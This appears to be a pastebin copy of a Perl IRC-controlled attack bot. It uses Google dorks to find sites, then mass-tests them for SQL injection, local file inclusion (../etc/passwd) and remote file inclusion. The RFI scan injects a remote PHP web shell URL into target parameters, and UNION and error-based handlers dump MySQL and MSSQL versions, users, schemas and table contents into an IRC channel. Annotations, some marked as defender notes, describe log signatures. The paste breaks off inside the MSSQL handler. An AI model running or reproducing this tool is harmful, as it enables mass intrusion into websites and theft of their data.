
Edoindoxploit

a guest
May 24th, 2019
  1. #!/usr/bin/perl
  2. #
  3. # OOO OOO OO OO OO
  4. # OO O O O O
  5. # O O O OO OO O O O O OO OOO OOOO OOOOO
  6. # O O O O O O O OOO OO OOOOOO O
  7. # O OO O O O O O O O O OOOOOO
  8. # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
  9. ################################################################################################################################
  10. # AlpHaNiX IRC BOT V1.5 beta
  11. ################################################################################################################################
  12. # [+] What's New in this version ?
  13. # 1/ RFI Vulnerable Scanner
  14. # 2/ LFI Vulnerable Scanner
  15. # 3/ an msg when scan finish
  16. # 4/ msg appear once banned from google search
  17. ################################################################################################################################
  18. # [+] About :
  19. ################################################################################################################################
  20. # Language : PERL
  21. # Coder : AlpHaNiX
  22. ################################################################################################################################
  23. # [+] Usage :
  24. ################################################################################################################################
  25. # ------------ You Must Change BOT Config First Of ALL
  26. # ------------ Bot Commands :
  27. #-- !md5 <word> => make an md5 hash
  28. #-- !md5crack <hash> => crack md5 hashes
  29. #-- !base64 <word> => encode with base64
  30. #-- !basedecode <text to decode> => decode base64 text
  31. #-- !lastsploits => to get lastest sploits from milw0rm
  32. #-------------------------------------{ SQL INJECTION FUNCTIONS }-----------------------------------------
  33. #-- !col <vuln> => calculate number of columns in a sql vulnerable
  34. #-- !det <vuln> * => MySQL DB Details (version , user ,db , dir )
  35. #-- !schema <vuln> * => Extract all (DB's , Tables , Columns) names
  36. #-- !dump <vuln> * => Dump Data from a column & table
  37. #-- !ms <vuln> => Get MsSQL DB Details
  38. # ===>>> * you must enter vuln this way http://target.com/page.php?id=0+union+select+1,nullarea,2,3
  39. #-------------------------------------{ Vulnerability scan FUNCTIONS }-----------------------------------------
  40. #-- !sqlscan <dork> => fetch url's from google and check if sql vuln or not
  41. #-- !rfiscan <dork> => fetch url's from google and check if rfi vuln or not
  42. #-- !lfiscan <dork> => fetch url's from google and check if lfi vuln or not
  43. ################################################################################################################################
  44. # [+] Contact :
  45. ################################################################################################################################
  46. # E-Mail Address : AlpHa[AT]Hacker[DOT]BZ
  47. # Home Page : http://NullArea.Net
  48. # My Blog : #http://NullArea.Net/blog
  49. ################################################################################################################################
  50. # [+] Greetz :
  51. ################################################################################################################################
  52. # Greetz For My Best Friend Zigma !
  53. # Special Thanks For All of : Djekmani4ever / Unary / DexTeR Corleon / r1z
  54. ################################################################################################################################
  55. # -------------------- Made In Tunisia
  56. ################################################################################################################################
  57. use IO::Socket::INET ;
  58. use LWP::UserAgent;
  59. use LWP::Simple;
  60. use Digest::MD5 qw(md5_hex);
  61. use MIME::Base64;
  62. ############################################################################################
  63. my $server = "choopa.nj.us.dal.net"; # IRC server used as the bot's command channel
  64. my $port = "6667"; # IRC server port; the connection made below is a plain TCP socket
  65. my $nick = "edo[Scan]"; # Nick the bot registers with
  66. my $channel = "#edoo"; # Channel the bot joins and reads commands from
  67. my $name = "nix akusapa alpha unr"; # Parameters sent after USER at registration
  68. my $phpshell = "https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php"; # URL of a remote PHP file that rfiscan appends to candidate URLs
  69. ############################################################################################
  70. system('cls'); # Runs `cls` through the shell to clear the operator's console
  71. print "\n\n\n\n OOO OOO OO OO OO\n" ; # Lines 71-77 print the start-up banner to the local console only
  72. print " OO O O O O\n" ;
  73. print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
  74. print " O O O O O O O OOO OO OOOOOO O\n" ;
  75. print " O OO O O O O O O O O OOOOOO\n" ;
  76. print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
  77. print " \n\n AlpHaNiX IRC BOT V1 \n\n";
  78. print "\n [+] Connection To $server ....\n"; # Local status message, nothing is sent yet
  79. ############################################################################################
  80. $connection = IO::Socket::INET->new(PeerAddr=>"$server", # Package global (no `my`); every sub below writes to this socket
  81. PeerPort=>"$port",
  82. Proto=>'tcp',
  83. Timeout=>'30') or die " [!] Couldnt Connect To $server\n"; # Exits if the socket cannot be created
  84. print " [+] Connected To $server ....\n\n"; # Local status message
  85. ############################################################################################
  86. print $connection "USER $name\n"; # IRC registration: USER line built from $name (terminated with \n only)
  87. print $connection "NICK $nick\r\n"; # IRC registration: requests the configured nick
  88. ############################################################################################
  89. while($response = <$connection>) # Main loop: read one line from the IRC server per iteration and dispatch on it
  90. { # Handlers are called without arguments and read the regex captures of the line that matched ($1 = sender nick, $3 = argument)
  91. print $response; #print IRC Response
  92. if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN $channel\r\n";} #-------Join Channel whenever a line matches this " 00" pattern
  93. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;} #-------Print Help; the sender part is (.*)!(.*), so this pattern accepts any sender in the channel
  94. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5 (.*)$/){&md5encode;} #------- md5encoder
  95. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5crack (.*)$/){&md5cracker;} #-------md5cracker
  96. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!base64 (.*)$/){&base64;} #-------base64 encoder
  97. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!basedecode (.*)$/){&basedecode;}#-------base64decoder
  98. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!iplocation (.*)$/){&iplocation;}#-------ip locator
  99. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lastsploits/){&milw0rm;} #-------last sploits
  100. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!sqlscan (.*)$/){&sqlscan;} #-------SQLi scanner
  101. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lfiscan (.*)$/){&lfiscan;} #-------LFI Scanner
  102. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rfiscan (.*)$/){&rfiscan;} #-------RFI Scanner
  103. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!col (.*)$/){&colcount;} #-------column counter
  104. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!det (.*)$/){&mysqldet;} #-------details grabber
  105. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!schema (.*)$/){&schema;} #-------schema extractor
  106. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!dump (.*)-(.*)-(.*)$/){&mysqldumper}#-------data dumper; three dash-separated arguments become $3, $4, $5
  107. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!ms (.*)$/){&mssqldet} #-------mssql details grabber
  108. if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";} #-------ping response: echoes the server's PING token back
  109. }
  110. ############################################################################################
  111. sub help # Handler for !help: sends the command list to $channel, one PRIVMSG per line
  112. { # Takes no arguments; writes to the global $connection socket
  113. print $connection "PRIVMSG $channel :8,1 AlpHaNiX IRC BOT V1.5 Help : \r\n";
  114. print $connection "PRIVMSG $channel :8,1 \r\n";
  115. print $connection "PRIVMSG $channel :4,1 --------------== Encoding Services ==--------------\r\n";
  116. print $connection "PRIVMSG $channel :9,1 To Generate an MD5 Hash => : 11,1 !md5 word \r\n";
  117. print $connection "PRIVMSG $channel :9,1 To Crack an MD5 Hash => : 11,1 !md5crack Hash \r\n";
  118. print $connection "PRIVMSG $channel :9,1 To Encode with Base64 => : 11,1 !base64 word \r\n";
  119. print $connection "PRIVMSG $channel :9,1 To Decode Base64 => : 11,1 !basedecode base64 \r\n";
  120. print $connection "PRIVMSG $channel :4,1 ----------------== Other Services ==---------------\r\n";
  121. print $connection "PRIVMSG $channel :9,1 Check IP Location => : 11,1 !iplocation ip \r\n";
  122. print $connection "PRIVMSG $channel :9,1 Get lastest Sploits => : 11,1 !lastsploits \r\n";
  123. print $connection "PRIVMSG $channel :4,1 ----------------== SQL Injection ==----------------\r\n";
  124. print $connection "PRIVMSG $channel :9,1 MySQL Column Count => : 11,1 !col target \r\n";
  125. print $connection "PRIVMSG $channel :9,1 MySQL DB Details => : 11,1 !det target \r\n";
  126. print $connection "PRIVMSG $channel :9,1 MySQL Schema Extractor => : 11,1 !schema target \r\n";
  127. print $connection "PRIVMSG $channel :9,1 MySQL Data Dumper => : 11,1 !dump target \r\n";
  128. print $connection "PRIVMSG $channel :9,1 MsSQL Details => : 11,1 !ms target \r\n";
  129. print $connection "PRIVMSG $channel :4,1 ------------== Vulnerablitys Scanner ==------------\r\n";
  130. print $connection "PRIVMSG $channel :9,1 SQL Vuln Scanner => : 11,1 !sqlscan dork \r\n";
  131. print $connection "PRIVMSG $channel :9,1 LFI Vuln Scanner => : 11,1 !lfiscan dork \r\n";
  132. print $connection "PRIVMSG $channel :9,1 RFI Vuln Scanner => : 11,1 !rfiscan dork \r\n";
  133. }
  134. ############################################################################################
  135. sub md5encode # Handler for !md5: replies in $channel with the MD5 hex digest of the argument
  136. {
  137. my $md5_hash = $3; # Argument text: third capture of the dispatch regex in the main loop
  138. my $asker = $1; # Sender nick: first capture of the same regex
  139. my $md5_generated = md5_hex($md5_hash); # NOTE(review): the capture is taken with (.*)$ so a trailing \r from the IRC line may be hashed too - confirm
  140. print $connection "PRIVMSG $channel :4$asker , done =>6 $md5_generated\r\n";
  141. }
  142. ############################################################################################
  143. sub md5cracker # Handler for !md5crack: looks the hash up on a third-party web service and relays the answer
  144. {
  145. my $asker = $1; # Sender nick from the dispatch regex
  146. my $hash = $3; # Hash text from the dispatch regex
  147. if (length($hash) != 33) # Accepts only 33-character input; presumably 32 hex digits plus a trailing \r - confirm
  148. {
  149. print $connection "PRIVMSG $channel :Not Valid MD5 Hash !\r\n";
  150. }
  151. else
  152. {
  153. my $ua = LWP::UserAgent->new();
  154. my $contents = $ua->get('http://md5.rednoize.com/?p&s=md5&q='.$hash); # The hash leaves the host in the query string of a plain-HTTP request
  155. my $cracked = $contents->content;
  156. if ($cracked) # Any non-empty response body is treated as the answer; the HTTP status is not checked
  157. {
  158. print $connection "PRIVMSG $channel :4$asker Cracked ! =>6 $cracked\r\n"; # The response body is relayed to the channel as received
  159. }
  160. else
  161. {
  162. print $connection "PRIVMSG $channel :4$asker,6 Not Found !\r\n";
  163. }
  164. }
  165. }
  166. ############################################################################################
  167. sub base64 # Handler for !base64: replies in $channel with the Base64 encoding of the argument
  168. {
  169. my $base64 = $3; # Argument text from the dispatch regex
  170. my $asker = $1; # Sender nick from the dispatch regex
  171. my $base64_encoded = encode_base64($base64); # Called without an end-of-line argument, so MIME::Base64 appends "\n" to the output
  172. print $connection "PRIVMSG $channel :4$asker,6 Encoded => $base64_encoded\r\n";
  173. }
  174. ############################################################################################
  175. sub basedecode # Handler for !basedecode: replies in $channel with the Base64-decoded argument
  176. {
  177. my $base64d = $3; # Argument text from the dispatch regex
  178. my $asker = $1; # Sender nick from the dispatch regex
  179. my $base64_decoded = decode_base64($base64d);
  180. print $connection "PRIVMSG $channel :4$asker,6 Decoded => $base64_decoded\r\n"; # Decoded bytes are written to the socket as-is; nothing here removes CR/LF or control characters
  181. }
  182. ############################################################################################
  183. sub iplocation # Handler for !iplocation: asks a third-party lookup page for the country of an IP and relays it
  184. {
  185. my $asker = $1; # Sender nick from the dispatch regex
  186. my $ip = $3; # Argument text from the dispatch regex
  187. if (length($ip) > 17) # The only input check is this length limit; the format is not validated
  188. {
  189. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  190. }
  191. else
  192. {
  193. my $ua = LWP::UserAgent->new();
  194. my $contents = $ua->get('http://www.melissadata.com/lookups/iplocation.asp?ipaddress='.$ip); # Argument is concatenated into the query string unencoded
  195. my $found = $contents->content;
  196. if ($found =~ /<tr><td align="right">Country<\/td><td><b>(.*)<\/b><\/td><\/tr>/) # Scrapes the Country cell out of the returned HTML
  197. {
  198. print $connection "PRIVMSG $channel :4$asker , The IP Location =>6 $1\r\n"; # $1 here is the country captured just above, not the sender nick
  199. }
  200. else
  201. {
  202. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  203. }
  204. }
  205. }
  206. ############################################################################################
  207. sub milw0rm # Handler for !lastsploits: fetches an RSS feed and posts date, title and link of each item to $channel
  208. {
  209. my $rss = get('http://milw0rm.com/rss.php'); # get() comes from LWP::Simple
  210. my $xml = XMLin($rss); # NOTE(review): no `use` line on this page provides XMLin - confirm where it is expected to come from
  211. my $spl = scalar(@{$xml->{channel}->{item}}); # Number of feed items
  212. for ($i=0; $i<$spl; $i++) # $i is a package global (no `my`)
  213. {
  214. print $connection "PRIVMSG $channel :4\n";
  215. print $connection "PRIVMSG $channel :6Date : $xml->{channel}->{item}->[$i]->{pubDate}\n";
  216. print $connection "PRIVMSG $channel :6Title: $xml->{channel}->{item}->[$i]->{title}\n";
  217. print $connection "PRIVMSG $channel :6Link : $xml->{channel}->{item}->[$i]->{link}\n\n";
  218. }
  219. }
  220. ############################################################################################
  221. sub sqlscan # Handler for !sqlscan: takes URLs from search-engine result pages, requests each with a fixed suffix and reports pages that return database error text
  222. {
  223. my $asker = $1; # Sender nick from the dispatch regex
  224. my $dork = $3; # Search query from the dispatch regex
  225. print $connection "PRIVMSG $channel :4$asker 12[+] SQL Vulnerable Scan Started ....\r\n";
  226. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  227. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ; # Query is interpolated into the search URL unencoded
  228. #----
  229. my $request = HTTP::Request->new(GET=>"$google"."$i");
  230. my $useragent = LWP::UserAgent->new(agent => 'Firefox 3.0.9'); # Defender note: this first request carries the literal User-Agent 'Firefox 3.0.9'
  231. my $response = $useragent->request($request) ;
  232. my $con = $response->content;
  233. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i) # Text of the search engine's block page
  234. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  235. else
  236. {
  237. for ($i=0;$i<200;$i=$i+10) # Steps the start= offset from 0 to 190 in tens
  238. {
  239. my $request = HTTP::Request->new(GET=>"$google"."$i");
  240. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2'); # Defender note: result-page requests carry the literal User-Agent 'Mozilla 5.2'
  241. my $response = $useragent->request($request) ;
  242. my $con = $response->content;
  243. my $start='class=r><a href=\"'; # Markers around a result link in the returned HTML
  244. my $end= '" class=l>';
  245. while ( $con =~ m/$start(.*?)$end/g ) # One iteration per result link found on the page
  246. {
  247. my $fl = $1; # Result URL
  248. my $link = $fl.'0+order+by+9999999--'; # Defender note: this literal suffix is what appears in the access log of every probed site
  249. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  250. my $ua = LWP::UserAgent->new(); # No agent is set here, so LWP's default User-Agent string is sent to the probed site
  251. my $req = $ua->get($link);
  252. my $result = $req->content;
  253. if ($result=~ m/You have an error in your SQL syntax/i || $result=~ m/Query failed/i || $result=~ m/SQL query failed/i || $result=~ m/mysql_fetch_/i || $result=~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i ) # MySQL/PHP error text in the body; pages that do not echo database errors never match
  254. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MySQL Vulnerable Website ->6 $fl\r\n";}
  255. elsif ($result=~ m/ODBC SQL Server Driver/i || $result=~ m/Unclosed quotation mark/i || $result=~ m/Microsoft OLE DB Provider for/i ) # SQL Server error text
  256. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MsSQL Vulnerable Website ->6 $fl\r\n";}
  257. elsif ($result=~ m/Microsoft JET Database/i || $result=~ m/ODBC Microsoft Access Driver/i ) # MS Access error text
  258. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MS Access Vulnerable Website ->6 $fl\r\n";}
  259. }
  260. }
  261. print $connection "PRIVMSG $channel :4$asker 12[!] SQL Scan Finished !\r\n";
  262. }
  263. }
  264. ############################################################################################
  265. sub lfiscan # Handler for !lfiscan: takes URLs from a search-engine result page and requests them with path-traversal suffixes, reporting responses that contain passwd-file content
  266. {
  267. my $asker = $1; # Sender nick from the dispatch regex
  268. my $dork = $3; # Search query from the dispatch regex
  269. print $connection "PRIVMSG $channel :4$asker 12[+] LFI Vulnerable Scan Started ....\r\n";
  270. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  271. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ; # Query is interpolated into the search URL unencoded
  272. @LFI = ('../etc/passwd', # Package global (no `my`): 14 suffixes, each a run of ../ ending in etc/passwd
  273. '../../etc/passwd', # Defender note: a request whose parameter value ends in one of these strings matches this list
  274. '../../../etc/passwd',
  275. '../../../../etc/passwd',
  276. '../../../../../etc/passwd',
  277. '../../../../../../etc/passwd',
  278. '../../../../../../../etc/passwd',
  279. '../../../../../../../../etc/passwd',
  280. '../../../../../../../../../etc/passwd',
  281. '../../../../../../../../../../etc/passwd',
  282. '../../../../../../../../../../../etc/passwd',
  283. '../../../../../../../../../../../../etc/passwd',
  284. '../../../../../../../../../../../../../etc/passwd',
  285. '../../../../../../../../../../../../../../etc/passwd',);
  286. my $request = HTTP::Request->new(GET=>"$google"."$i");
  287. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2'); # Defender note: the search request carries the literal User-Agent 'Mozilla 5.2'
  288. my $response = $useragent->request($request) ;
  289. my $con = $response->content;
  290. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i) # Text of the search engine's block page
  291. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  292. else
  293. {
  294. for ($i=0;$i<200;$i=$i+10)
  295. {
  296. my $start='class=r><a href=\"'; # Markers around a result link in the returned HTML
  297. my $end= '" class=l>';
  298. while ( $con =~ m/$start(.*?)$end/g ) # One iteration per result link found in $con
  299. {
  300. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  301. for ($j;$j<=14;$j++) # $j is a package global (no `my`)
  302. {
  303. my $fl = $1; # Result URL
  304. my $link = $fl.$LFI[$j]; # Result URL with one traversal suffix appended
  305. my $ua = LWP::UserAgent->new(); # No agent is set here, so LWP's default User-Agent string is sent to the probed site
  306. my $req = $ua->get($link);
  307. my $result = $req->content;
  308. if ($result=~ m/root:x:/i) # A body containing root:x: is treated as passwd-file content
  309. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible LFI Vulnerable Website ->6 $fl\r\n";}
  310. }
  311. }
  312. }
  313. print $connection "PRIVMSG $channel :4$asker 12[!] LFI Scan Finished !\r\n";
  314. }
  315. }
  316. ############################################################################################
  317. sub rfiscan # Handler for !rfiscan: takes URLs from a search-engine result page and requests them with the configured $phpshell URL appended, reporting responses that contain "uid="
  318. {
  319. my $asker = $1; # Sender nick from the dispatch regex
  320. my $dork = $3; # Search query from the dispatch regex
  321. print $connection "PRIVMSG $channel :4$asker 12[+] RFI Vulnerable Scan Started ....\r\n";
  322. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  323. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ; # Query is interpolated into the search URL unencoded
  324. #----
  325. my $request = HTTP::Request->new(GET=>"$google"."$i");
  326. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2'); # Defender note: the search request carries the literal User-Agent 'Mozilla 5.2'
  327. my $response = $useragent->request($request) ;
  328. my $con = $response->content;
  329. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i) # Text of the search engine's block page
  330. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  331. else
  332. {
  333. for ($i=0;$i<200;$i=$i+10)
  334. {
  335. my $start='class=r><a href=\"'; # Markers around a result link in the returned HTML
  336. my $end= '" class=l>';
  337. while ( $con =~ m/$start(.*?)$end/g ) # One iteration per result link found in $con
  338. {
  339. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  340. my $fl = $1; # Result URL
  341. my $link = $fl.$phpshell.'??'; # Defender note: the logged request has a parameter value that is itself a full remote URL followed by ??
  342. my $ua = LWP::UserAgent->new(); # No agent is set here, so LWP's default User-Agent string is sent to the probed site
  343. my $req = $ua->get($link);
  344. my $result = $req->content;
  345. if ($result=~ m/uid=/i) # The only success test is the substring uid= in the body
  346. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible RFI Vulnerable Website ->6 $fl\r\n";}
  347. }
  348. }
  349. print $connection "PRIVMSG $channel :4$asker 12[!] RFI Scan Finished !\r\n";
  350. }
  351. }
  352. ############################################################################################
  353. sub colcount # Handler for !col: requests the target URL with UNION SELECT lists of growing length and reports the length at which a marker string is reflected
  354. {
  355. my $asker = $1; # Sender nick from the dispatch regex
  356. print $connection "PRIVMSG $channel :4$asker 12[+] Column Counting Started , Please Wait ....\r\n";
  357. my $site = $3 ; # Target URL from the dispatch regex
  358. my $null = "09+and+1=" ; # Fixed fragments the request URLs are assembled from
  359. my $code = "0+union+select+" ;
  360. my $add = "+" ;
  361. my $com = "--" ;
  362. my $injection = $site.$null.$code."0",$com ; # URL of the first request
  363. my $request = HTTP::Request->new(GET=>$injection);
  364. my $useragent = LWP::UserAgent->new(); # No agent is set, so LWP's default User-Agent string is sent
  365. my $response = $useragent->request($request);
  366. my $result = $response->content;
  367. if( $result =~ /You have an error in your SQL syntax/ || $result=~/Query failed/ || $result=~/SQL query failed/ || $result=~ /mysql_fetch_/ || $result=~ /mysql_fetch_array/ || $result =~ /mysql_num_rows/ || $result =~ /The used SELECT statements have a different number of columns/) # Database error text echoed in the body; pages that do not echo database errors never match
  368. {
  369. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is Vulnerable\n" ;
  370. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It\n";
  371. }
  372. else
  373. {
  374. print $connection "PRIVMSG $channel :4$asker 10[!] This WebSite Is Not SQL Vulnerable !\n\n";
  375. }
  376. for ($i = 0 ; $i < 50 ; $i ++) # Runs in both branches above; $i, $col, $specialword and $sql are package globals
  377. {
  378. $col.=','.$i;
  379. $specialword.=','."0x617a38387069783030713938"; # Defender note: this hex literal is the ASCII marker az88pix00q98 tested for below; either form in logs or responses points to this tool
  380. if ($i == 0)
  381. {
  382. $specialword = '' ;
  383. $col = '' ;
  384. }
  385. $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ; # Request URL for this iteration
  386. my $ua = LWP::UserAgent->new();
  387. my $res = $ua->get($sql);
  388. $response=$res->content;
  389. if($response =~ /az88pix00q98/) # The marker came back in the page
  390. {
  391. $i ++;
  392. print $connection "PRIVMSG $channel :4$asker 12[+] This Injection Have6 $i 12Columns\n" ;
  393. }
  394. }
  395. }
  396. ############################################################################################
  397. sub mysqldet # Handler for !det: swaps a placeholder in the supplied URL for a concat() expression and relays the MySQL version, database, user and data directory it reads back
  398. {
  399. my $asker = $1; # Sender nick; copied first because the regex matches below overwrite $1
  400. my $site = $3 ; # Target URL from the dispatch regex
  401. my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938,\@\@datadir,0x617a38387069783030713938)"; # Values are delimited by the hex form of the marker az88pix00q98; defender note: this literal appears in the query string of the request
  402. print $connection "PRIVMSG $channel :4$asker 12[+] Info Getting, Started Please Wait ....\r\n";
  403. if ($site =~ /(.*)NullArea(.*)/i) # The supplied URL must contain the placeholder word, matched case-insensitively
  404. {
  405. $newlink = $1.$selection.$2.'--'; # Placeholder replaced by the expression; $newlink is a package global
  406. my $ua = LWP::UserAgent->new(); # No agent is set, so LWP's default User-Agent string is sent
  407. my $request = $ua->get($newlink);
  408. my $content = $request->content;
  409. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/) # Four values between five markers in the returned page
  410. {
  411. print $connection "PRIVMSG $channel :4$asker 12[+] Database Version :6 $1\r\n";
  412. print $connection "PRIVMSG $channel :4$asker 12[+] Database Name :6 $2\r\n";
  413. print $connection "PRIVMSG $channel :4$asker 12[+] DB UserName :6 $3\r\n";
  414. print $connection "PRIVMSG $channel :4$asker 12[+] Databse Dir :6 $4\r\n";
  415. }
  416. else
  417. {
  418. print $connection "PRIVMSG $channel :4$asker 12[!] Failed\r\n";
  419. }
  420. }
  421. else
  422. {
  423. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  424. }
  425. }
  426. ############################################################################################
  427. sub schema # Handler for !schema: reads information_schema.columns one row per request through the supplied URL and relays table, column and database names
  428. {
  429. my $asker = $1; # Sender nick; copied first because the regex matches below overwrite $1
  430. my $site = $3 ; # Target URL from the dispatch regex
  431. my $selection = "concat(0x617a38387069783030713938,table_name,0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)"; # Values are delimited by the hex form of the marker az88pix00q98
  432. if ($site =~ /(.*)NullArea(.*)/i) # The supplied URL must contain the placeholder word
  433. {
  434. print $connection "PRIVMSG $channel :4$asker 12[+] 6Table 12:|: 6Column 12:|: 6Database\r\n";
  435. for ($i ; $i<=1500 ; $i++ ) # Defender note: shows up in logs as a long run of near-identical requests that differ only in the LIMIT offset; $i is a package global
  436. {
  437. $newstring = $1.$selection.$2.'+'.'from'.'+'.'information_schema.columns'.'+'.'LIMIT'.'+'.$i.','.'1'.'--'; # Reads $1/$2 on each pass; statement order matters here
  438. my $ua = LWP::UserAgent->new(); # No agent is set, so LWP's default User-Agent string is sent
  439. my $request = $ua->get($newstring);
  440. my $content = $request->content;
  441. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/) # Three values between four markers in the returned page
  442. {
  443. print $connection "PRIVMSG $channel :4$asker 12[!] 6$1 12:|: 6$2 12:|: 6$3 \r\n";
  444. }
  445. }
  446. }
  447. else
  448. {
  449. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  450. }
  451. }
  452. ############################################################################################
  453. sub mysqldumper # Handler for !dump: reads one column of one table, one row per request, through the supplied URL and relays each value to $channel
  454. {
  455. my $asker = $1; # Sender nick; copied first because the regex matches below overwrite the captures
  456. my $site = $3 ; # Target URL: first of the three dash-separated arguments
  457. my $table = $5 ; # Table name: third argument
  458. my $selection = "concat(0x617a38387069783030713938,$4,0x617a38387069783030713938)"; # $4 is the column name (second argument), wrapped in the hex form of the marker az88pix00q98
  459. if ($site =~ /(.*)NullArea(.*)/i) # The supplied URL must contain the placeholder word
  460. {
  461. print $connection "PRIVMSG $channel :4$asker 12[+] 6 DATA\r\n";
  462. for ($i ; $i<=1500 ; $i++ ) # Defender note: shows up in logs as a long run of near-identical requests that differ only in the LIMIT offset; $i is a package global
  463. {
  464. $newstring = $1.$selection.$2.'+'.'from'.'+'.$table.'+'.'LIMIT'.'+'.$i.','.'1'.'--'; # Reads $1/$2 on each pass; statement order matters here
  465. my $ua = LWP::UserAgent->new(); # No agent is set, so LWP's default User-Agent string is sent
  466. my $request = $ua->get($newstring);
  467. my $content = $request->content;
  468. if ($content =~ /az88pix00q98(.*)az88pix00q98/) # One value between two markers in the returned page
  469. {
  470. print $connection "PRIVMSG $channel :4$asker 12[!] 6 $1\r\n"; # Values taken from the target are relayed to the IRC channel in clear text
  471. }
  472. }
  473. }
  474. else
  475. {
  476. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3-column_name-table_name\r\n";
  477. }
  478. }
  479. ############################################################################################
  480. sub mssqldet # Handler for !ms: appends convert(int, ...) expressions to the supplied URL and relays the values it reads out of the returned text
  481. {
  482. my $asker = $1; # Sender nick from the dispatch regex
  483. print $connection "PRIVMSG $channel :4$asker 12[+] Getting Infos Started , Please Wait ....\r\n";
  484. my $target = $3 ; # Target URL from the dispatch regex
  485. print "\n[+] Working On $target" ; # Written to the operator's local console, not to IRC
  486. my $version = 'convert(int,(select+@@version));--' ; # Five suffixes, one per value; defender note: convert(int,(select+ in a query string is the log signature of this handler
  487. my $system_user = 'convert(int,(select+system_user));--';
  488. my $db_name = 'convert(int,(select+db_name()));--';
  489. my $servername = 'convert(int,(select+@@servername));--' ;
  490. my $hostname = 'convert(int,(select+Host_Name()));--';
  491. my $site = $target ;
  492. my $injection = $site.$version ;
  493. my $request = HTTP::Request->new(GET=>$injection);
  494. my $useragent = LWP::UserAgent->new(); # No agent is set, so LWP's default User-Agent string is sent
  495. my $response = $useragent->request($request)->as_string ; # Full response text, headers included
  496. if ($response =~ /.*?value\s'/) # Proceeds only if the response contains the text value ' ; pages that do not echo database errors never match
  497. {
  498. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is SQL Vulnerable ..\r\n";
  499. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It ..\r\n";
  500.  
  501. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ; # Takes the text between value ' and ' to ; $ver is a package global
  502.  
  503. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Version Is : 6$ver\r\n";
  504.  
  505. my $injection = $site.$system_user ; # Same request-and-extract steps repeated for system_user
  506. my $request = HTTP::Request->new(GET=>$injection);
  507. my $useragent = LWP::UserAgent->new();
  508. $useragent->timeout(10); # 10-second timeout on the follow-up requests
  509. my $response = $useragent->request($request)->as_string ;
  510. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/); # On no match the variable still holds the suffix string assigned above
